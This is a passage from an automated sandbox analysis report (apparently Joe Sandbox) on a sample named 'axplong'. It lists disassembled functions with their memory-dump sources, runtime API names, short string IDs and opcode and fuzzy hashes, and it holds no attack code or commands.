                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc34073d0a7c9e8b0cb82df18743a79aa6ecaba82719e7ab1f9d8a52465410f8
                      • Instruction ID: f8e8050e92496965ff2d404398e874a14cc6d597ddc0b5d2317cd022581512a8
                      • Opcode Fuzzy Hash: bc34073d0a7c9e8b0cb82df18743a79aa6ecaba82719e7ab1f9d8a52465410f8
                      • Instruction Fuzzy Hash: 9F118A23F30C255B675C817D8C1727AA5D2EBD825071F533AD826E7384F9A4DE23D290
                      Function 007D8720 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 45fe932c4440ff9da24f73b4167aac42ae4a764a40bf4fff68e631ea100cd58f
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 93115B7B20014143D6C486BDC8F45B7A7B6EBD5331B3D437BC0814B758DE2AE944D902
                      Function 007C645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0e1748daed78890de0225781a804db89e6a9385cb128909560a936ad5d36a48
                      • Instruction ID: c71023c15bb6bc017b24bd81c66dd64621db1c77713cfce9373acbfbf7811418
                      • Opcode Fuzzy Hash: c0e1748daed78890de0225781a804db89e6a9385cb128909560a936ad5d36a48
                      • Instruction Fuzzy Hash: E3E08C3014168CBBCF297F14C848E483B6AEB41799F00841CF8048A621CB7DEFA2CA80
                      Function 007CA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 4c71f0ec3b760028eb6d788accf573f395a2b8050a423e0adc3c36812a5d4c72
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 02E0463291122CFBCB15DB888908E8AF3BCEB48B05F19409EB501D3240C274DF00C7D1
                      Function 007C70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: e4319fb7e9396dab1c1a278b94e4c64eb2cff86d7cedba8abcf502081cdd52bc
                      • Instruction ID: 14b02944386fcb5c7fa49884250fce1363a0af6aa8c2b4237b63f170756c1075
                      • Opcode Fuzzy Hash: e4319fb7e9396dab1c1a278b94e4c64eb2cff86d7cedba8abcf502081cdd52bc
                      • Instruction Fuzzy Hash: B101A52760866A66565C645D9C07F3B179C9BC6BB471D002FF944E72C2DE5CEC428590
                      Function 00792E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 4683adfabb82a2d5cba245e385537e692c2e832277e1db857438c6cc1223b52f
                      • Instruction ID: 8e24b2df8011f05b455e08cc662bb9ad6c2e4a718336a72ddef6b2eb1bead7d9
                      • Opcode Fuzzy Hash: 4683adfabb82a2d5cba245e385537e692c2e832277e1db857438c6cc1223b52f
                      • Instruction Fuzzy Hash: 45A104B0A01709EFDF11DF68D84976AB7B9FF56314F008269E815D7252EB38EA04CB91
                      Function 00792670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00792806
                      • ___std_exception_destroy.LIBVCRUNTIME ref: 007928A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy___std_exception_destroy
                      • String ID: P#y$P#y
                      • API String ID: 2970364248-534735823
                      • Opcode ID: 644f4482ef3d92b9e2d9318a9c7a8979090eb22987862d0019645e5f3f65c767
                      • Instruction ID: 0507d6469465ab9978bd041f9003a01653b8398bd89eca09a549eccce4b2f263
                      • Opcode Fuzzy Hash: 644f4482ef3d92b9e2d9318a9c7a8979090eb22987862d0019645e5f3f65c767
                      • Instruction Fuzzy Hash: A3717071E00248DBDF04DF98D885BDDBBB5EF59310F14422DE805A7242E778A984CBA5
                      Function 007A7870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                      Download Yara Rule
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 007A795C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 007A7968
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 007A7971
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: @yz
                      • API String ID: 4078500453-3254128207
                      • Opcode ID: ca137afc573bef1faa4a285e6c99193065647bab7e98abafa9d4ebfa74b63c86
                      • Instruction ID: 39a6b0bd7e3ccf3da1c45360f90a0854093fa76a65defc2bcb1c18f21fceab4a
                      • Opcode Fuzzy Hash: ca137afc573bef1faa4a285e6c99193065647bab7e98abafa9d4ebfa74b63c86
                      • Instruction Fuzzy Hash: A931F3B29043049BD724DF64D845A6BB7E8EF96310F10072EF546C3602E779FA54C7A1
                      Function 00792AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00792B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#y$P#y$This function cannot be called on a default constructed task
                      • API String ID: 2659868963-1304002132
                      • Opcode ID: ae4d9ebc70a98d9418ffd30948cdfd77edefe03b2cbc535d2cae4ef544fda597
                      • Instruction ID: 7e53cf73f6b12b72b923e00cff957e491a7add1286550c3a09ae666ac4435af1
                      • Opcode Fuzzy Hash: ae4d9ebc70a98d9418ffd30948cdfd77edefe03b2cbc535d2cae4ef544fda597
                      • Instruction Fuzzy Hash: 8AF02B71A1030CABCB10EF6DE841D9EB7EDDF09300F5082ADF80897201EB78AA54CB95
                      Function 007CC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: d14af661019cc91e1f021416d10a5f63aaa7be26c6c167c71b63dbff288ab80f
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 87B114729002859FDB22CF68C895FAEBBA5EF55340F1481AEE84D9B341D63C9D41CB60
                      Function 007ABAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 90fdcb8046db45b7fcbc767288d249d85deafe8000e22ba77f8a7bb5583d54ef
                      • Instruction ID: f114ae5d7fb4e72df4e13b703caa0e08bb348f469c9a7689d61c207a3a942999
                      • Opcode Fuzzy Hash: 90fdcb8046db45b7fcbc767288d249d85deafe8000e22ba77f8a7bb5583d54ef
                      • Instruction Fuzzy Hash: 82216271E01109EFDF11EFA4CC859BEBBB8EF89710F104165F601A7251DB78AD419BA1
                      Function 007A7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                      Download Yara Rule
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 007A726C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: @.y$`zz
                      • API String ID: 3366076730-310687464
                      • Opcode ID: bc136e843efb4be327eca9bc21c562a29d75622643b3ac9a66eeedf95846a6b8
                      • Instruction ID: d130fb60edd15d75238d5663a0282d44592f8eb0ecd3832a81baac27eeb53b6b
                      • Opcode Fuzzy Hash: bc136e843efb4be327eca9bc21c562a29d75622643b3ac9a66eeedf95846a6b8
                      • Instruction Fuzzy Hash: F9A127B0A01619CFDB25CFA8C88479EBBF0BF89710F158259E819AB351E7799D01CF90
                      Function 00793930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 00793962
                      • __Mtx_init_in_situ.LIBCPMT ref: 007939A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: pBy
                      • API String ID: 3366076730-1076254045
                      • Opcode ID: 9038bb56f7db7642c78ac8ca0292863eb4a7833688dd109794002f70c29fa550
                      • Instruction ID: bcb062404f438c63d0db7793a082e1a7e4a992e6406544eb53d52a90d7afceff
                      • Opcode Fuzzy Hash: 9038bb56f7db7642c78ac8ca0292863eb4a7833688dd109794002f70c29fa550
                      • Instruction Fuzzy Hash: 594115B0501B059FDB20CF19C588B5ABBF4FF84315F148619E96A8B341E7B9EA15CF80
                      Function 00792440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 0079247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#y$P#y
                      • API String ID: 2659868963-534735823
                      • Opcode ID: 19ebc9a4d80d1a0ad21a8ae899238908c91a21c3f19e5eb1b1a78a459c2560c6
